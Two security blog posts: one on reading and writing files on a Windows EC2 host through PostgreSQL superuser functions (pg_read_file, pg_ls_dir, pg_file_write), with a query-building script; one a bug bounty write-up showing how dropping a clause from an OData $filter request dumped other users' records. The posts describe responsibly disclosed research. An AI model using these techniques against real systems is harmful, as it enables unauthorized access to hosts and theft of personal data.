Saturday, April 18, 2026

Post-Exploitation on Windows EC2

After elevating your privileges to a database superuser on a remote Windows EC2 instance, you may find yourself wanting to figure out where you are and what host you are on (depending on the path taken to get to the server!). Unfortunately, if you only have limited remote read/write (such as in this situation) without full remote code execution, interacting with an ephemeral file system can be difficult. But as a superuser, you likely have permission to use pg_catalog.pg_file_write(), pg_ls_dir(), and/or pg_read_file(). So which areas of the file system can we read and write as an attacker?

It depends on a few layers of permissions across the Postgres instance, Windows, and EC2, but the traditional C:\Windows\win.ini is a great test to start with. Once that succeeded, I started using pg_ls_dir to list directories under C:\Users. If none of those can be accessed, try C:\ProgramData.
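As a sketch of what that enumeration can look like, the helpers below just build the SQL calls. pg_read_file() and pg_ls_dir() are real core PostgreSQL admin functions, but the helper names and the list of candidate paths are my own illustrative choices, not part of any tool:

```python
# Sketch: build superuser file-access queries for candidate Windows paths.
# pg_read_file()/pg_ls_dir() are core PostgreSQL admin functions; the
# helpers and the candidate path list are illustrative assumptions.

CANDIDATE_DIRS = [
    r"C:\Users",
    r"C:\ProgramData",
    r"C:\ProgramData\Amazon\EC2-Windows\Launch",
    r"C:\ProgramData\Amazon\Inspector\Logs",
]

def sql_quote(path: str) -> str:
    """Escape a path for use as a SQL string literal (double the quotes)."""
    return path.replace("'", "''")

def read_file_query(path: str) -> str:
    return f"SELECT pg_read_file('{sql_quote(path)}');"

def list_dir_query(path: str) -> str:
    return f"SELECT pg_ls_dir('{sql_quote(path)}');"

# Classic readability test first, then walk the candidate directories:
print(read_file_query(r"C:\Windows\win.ini"))
# SELECT pg_read_file('C:\Windows\win.ini');
for d in CANDIDATE_DIRS:
    print(list_dir_query(d))
```

Each query can then be sent through whatever limited read/write channel you already have into the database.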

Sometimes ACLs do weird things to EC2-specific directories. For example, I couldn't read logs under this directory:

C:\ProgramData\Amazon\EC2-Windows\Launch

However, I was able to read logs under:

C:\ProgramData\Amazon\Inspector\Logs

Those logs contained the information I was looking for (the first line of each log had the host name, EC2-AMAZ...). I was also able to write files to C:\ProgramData. Temp directories, however, didn't seem to work.

Your mileage may vary, but these are some of the locations likely accessible to the Postgres process, which Claude helped enumerate as a starting point.


Sunday, April 5, 2026

Bug Bounties: 150% Perspiration and 30000% Persuasion

Sometimes you need a combination of persuasive and technical writing in the lovely land of bug bounty hunting.

Recently, I found and exploited a particularly juicy Broken Object Level Authorization (BOLA) issue in a web app which led to a sensitive data dump (including medical data).

Intended Use Case:

Users are allowed to view their records as long as they provide their last name and "secret number". For example, a normal use case might be a user entering "MacDonald" and "12345". If they don't provide the name, they receive an error that both fields are required. Likewise, if they provide only the number, they receive the same error.

The API transactions can be viewed by pausing the traffic with Burp Suite's Intercept, and look something like:

 /_api/web/lists/GetByTitle('_GET_THE_GOODS')/items?$filter=ID_NUM%20eq%20%2712345%27%20and%20NAME_LAST%20eq%20%27MacDonald%27

To me, that looks a whole lot like an OData query that is being used to control access to the records! 
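Decoding the percent-encoding makes the OData shape obvious. A quick sketch (the path and field names come straight from the intercepted request above):

```python
from urllib.parse import unquote

# The intercepted request, with the list title redacted as in the write-up:
raw = ("/_api/web/lists/GetByTitle('_GET_THE_GOODS')/items"
       "?$filter=ID_NUM%20eq%20%2712345%27%20and%20NAME_LAST%20eq%20%27MacDonald%27")

# Decoded, the $filter reads as a plain OData boolean expression:
print(unquote(raw))
# ...$filter=ID_NUM eq '12345' and NAME_LAST eq 'MacDonald'
```

In other words, the server is taking the user-supplied values and evaluating them directly as an OData filter, which is exactly what invites tampering.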

Unintended Use Case: 

So, naturally, I paused the traffic and tried something like a wildcard to see if I could return everything without the "required" number and last name... but the site either couldn't return the data or was responding too slowly. NOTE: be cautious about how you test wildcards so you don't accidentally DoS a web application!

For the proof-of-concept, I had to strategize: 1.) make sure I wasn't DoSing them by asking for too many records, and 2.) consider privacy and keep the exfiltrated data to a minimum as part of responsible disclosure. So instead of a true wildcard in all fields (or removing all search clauses altogether), I used a common last name and removed the ID_NUM field.

 /_api/web/lists/GetByTitle('_GET_THE_GOODS')/items?$filter=NAME_LAST%20eq%20%27MacDonald%27 

Success! It returned many different records for that last name, all associated with different reference numbers. It seemed like a cut-and-dried proof of concept...
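The narrowed request can be reconstructed with a small sketch that percent-encodes a $filter from a list of clauses; the helper is hypothetical, but its output matches the requests shown above:

```python
from urllib.parse import quote

def filter_url(clauses):
    """Join OData clauses with ' and ' and percent-encode the $filter value.
    Illustrative helper; the endpoint path is from the intercepted request."""
    return ("/_api/web/lists/GetByTitle('_GET_THE_GOODS')/items?$filter="
            + quote(" and ".join(clauses), safe=""))

# Intended use: the UI always sends both clauses.
full = filter_url(["ID_NUM eq '12345'", "NAME_LAST eq 'MacDonald'"])

# PoC: drop the ID_NUM clause entirely and filter on last name alone.
poc = filter_url(["NAME_LAST eq 'MacDonald'"])
print(poc)
# .../items?$filter=NAME_LAST%20eq%20%27MacDonald%27
```

Dropping a clause (rather than wildcarding every field) is what kept the record count small enough to be both responsible and non-disruptive.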

Or Was It...

I wrote up the report, but unfortunately limiting the scope of my data dump caused a bit of confusion. They wanted to know "how I had gotten the reference number and name". I didn't. I explained again how the attack worked. So then they asked for a video. It still wasn't clear to them. At this point, I started to wonder whether my report was as clear as mud. The wording all looked good: clear, reproducible, step by step. So I exfiltrated a little more (again, very minimally, to protect the innocent), just enough to show that it could be any name or any number. Finally, two months later, they understood the issue and acknowledged the exploit.

Unfortunately, instead of fixing the app (which likely would have required quite a lot of architecture-level redesign from what I'd seen), they decided to remove the functionality (at least for now). As of today, the look-up process is handled by emailing a human instead. I'm a big fan of automation wherever possible, though, so I'm hoping that's a short-term band-aid ahead of a long-term, deeper architectural redesign.

Happy hacking, all!